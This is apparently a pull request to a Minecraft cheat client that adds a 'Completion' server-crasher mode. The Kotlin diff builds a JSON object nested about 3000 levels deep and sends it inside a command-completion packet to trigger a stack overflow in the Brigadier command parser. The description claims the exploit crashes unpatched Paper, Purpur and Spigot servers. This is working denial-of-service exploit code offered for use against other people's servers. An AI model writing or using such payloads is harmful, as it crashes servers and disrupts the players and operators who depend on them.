### PR TITLE
Added Command Completions ServerCrasher mode.

### DIFF
--- a/src/main/kotlin/net/ccbluex/liquidbounce/features/module/modules/exploit/servercrasher/ModuleServerCrasher.kt
+++ b/src/main/kotlin/net/ccbluex/liquidbounce/features/module/modules/exploit/servercrasher/ModuleServerCrasher.kt
@@ -30,6 +30,7 @@ object ModuleServerCrasher : Module("ServerCrasher", Category.EXPLOIT, disableOn
         NegativeInfinityExploit,
         CalcExploit,
         PromoteExploit,
+        CompletionExploit
     ))
 
 

--- a/src/main/kotlin/net/ccbluex/liquidbounce/features/module/modules/exploit/servercrasher/exploits/CompletionExploit.kt
+++ b/src/main/kotlin/net/ccbluex/liquidbounce/features/module/modules/exploit/servercrasher/exploits/CompletionExploit.kt
@@ -4,9 +4,8 @@ import com.google.gson.JsonObject
 import net.ccbluex.liquidbounce.config.Choice
 import net.ccbluex.liquidbounce.config.ChoiceConfigurable
 import net.ccbluex.liquidbounce.features.module.modules.exploit.servercrasher.ModuleServerCrasher
-import net.minecraft.network.packet.c2s.play.PlayerMoveC2SPacket
 import net.minecraft.network.packet.c2s.play.RequestCommandCompletionsC2SPacket
-import net.minecraft.network.packet.s2c.play.CommandSuggestionsS2CPacket
+import net.ccbluex.liquidbounce.utils.client.logger
 
 object CompletionExploit : Choice("Completion") {
 
@@ -15,15 +14,17 @@ object CompletionExploit : Choice("Completion") {
 
     override fun enable() {
         val overflow = try {
-            generateJsonObject(3000).toString().replace("\"", "") //Levels should be configurable from 2200-3500
+            //Levels should be configurable from 2200-3500
+            generateJsonObject(3000).toString().replace("\"", "")
         } catch (e: StackOverflowError) {
-            e.printStackTrace();
+            logger.warn("Failed to generate payload!")
             //Should not happen, server stack is more overloaded reading that.
             return;
         }
 
         // Seemed to work on 1.20.2, 1.20.4 paper/purpur servers, does not anymore.
-        // Latest server builds can kick if partialCommand length is greater than 6144, probably can be compressed even more.
+        // Latest server builds can kick if partialCommand length is greater than 6144,
+        // probably can be compressed even more.
         network.sendPacket(RequestCommandCompletionsC2SPacket(0, "msg @a[nbt=$overflow]"))
         ModuleServerCrasher.enabled = false
     }

--- a/src/main/kotlin/net/ccbluex/liquidbounce/features/module/modules/exploit/servercrasher/exploits/CompletionExploit.kt
+++ b/src/main/kotlin/net/ccbluex/liquidbounce/features/module/modules/exploit/servercrasher/exploits/CompletionExploit.kt
@@ -17,7 +17,7 @@ object CompletionExploit : Choice("Completion") {
             //Levels should be configurable from 2200-3500
             generateJsonObject(3000).toString().replace("\"", "")
         } catch (e: StackOverflowError) {
-            logger.warn("Failed to generate payload!")
+            logger.warn("Failed to generate payload!", e)
             //Should not happen, server stack is more overloaded reading that.
             return;
         }

--- a/src/main/kotlin/net/ccbluex/liquidbounce/features/module/modules/exploit/servercrasher/exploits/CompletionExploit.kt
+++ b/src/main/kotlin/net/ccbluex/liquidbounce/features/module/modules/exploit/servercrasher/exploits/CompletionExploit.kt
@@ -1,0 +1,39 @@
+package net.ccbluex.liquidbounce.features.module.modules.exploit.servercrasher.exploits
+
+import com.google.gson.JsonObject
+import net.ccbluex.liquidbounce.config.Choice
+import net.ccbluex.liquidbounce.config.ChoiceConfigurable
+import net.ccbluex.liquidbounce.features.module.modules.exploit.servercrasher.ModuleServerCrasher
+import net.minecraft.network.packet.c2s.play.PlayerMoveC2SPacket
+import net.minecraft.network.packet.c2s.play.RequestCommandCompletionsC2SPacket
+import net.minecraft.network.packet.s2c.play.CommandSuggestionsS2CPacket
+
+object CompletionExploit : Choice("Completion") {
+
+    override val parent: ChoiceConfigurable
+        get() = ModuleServerCrasher.exploitChoices
+
+    override fun enable() {
+        val overflow = try {
+            generateJsonObject(3000).toString().replace("\"", "") //Levels should be configurable from 2200-3500
+        } catch (e: StackOverflowError) {
+            e.printStackTrace();
+            //Should not happen, server stack is more overloaded reading that.
+            return;
+        }
+
+        // Seemed to work on 1.20.2, 1.20.4 paper/purpur servers, does not anymore.
+        // Latest server builds can kick if partialCommand length is greater than 6144, probably can be compressed even more.
+        network.sendPacket(RequestCommandCompletionsC2SPacket(0, "msg @a[nbt=$overflow]"))
+        ModuleServerCrasher.enabled = false
+    }
+
+    private fun generateJsonObject(levels: Int): JsonObject {
+        val jsonObject = JsonObject()
+        if (levels > 0) {
+            jsonObject.add("a", generateJsonObject(levels - 1))
+        }
+        return jsonObject
+    }
+
+}


### PR DESCRIPTION
This servercrasher mode is able to crash latest (unpatched) versions of purpur/paper/spigot
Seemed to work on 1.20.2, 1.20.4(Spigot)

Works by throwing stackoverflow in mojang brigadier command api.

Video: https://youtu.be/nRTR1bTDgJI?si=U9JnJOdjoQfnH048